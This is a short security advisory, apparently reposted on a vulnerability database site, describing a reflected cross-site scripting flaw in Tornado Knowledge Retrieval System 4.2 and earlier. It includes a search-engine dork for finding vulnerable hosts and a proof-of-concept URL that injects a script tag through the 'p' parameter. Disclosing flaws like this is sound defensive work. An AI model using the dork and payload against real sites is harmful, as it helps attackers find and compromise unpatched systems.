Tornado Knowledge Retrieval System <= 4.2 Remote XSS Vulnerability

2008-12-01 / 2008-12-02
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title =========:: Tornado Knowledge Retrieval System <= 4.2 Remote XSS Vulnerability Author ========:: unohope [at] chroot [dot] org IRC ===========:: irc.chroot.org #chroot ScriptName ====:: Tornado Knowledge Retrieval System ScriptVendor ==:: http://www.tornado.com.tw/ Dork ==========:: inurl:searcher.exe?v=root ______________________ [Cross-Site Scripting] - {searcher.exe} - http://localhost/tornado/searcher.exe?v=root&p=<script>alert(/xss/)</scr ipt> ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !!

References:

http://www.securityfocus.com/bid/29626
http://www.securityfocus.com/archive/1/archive/1/493217/100/0/threaded
http://secunia.com/advisories/30623


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top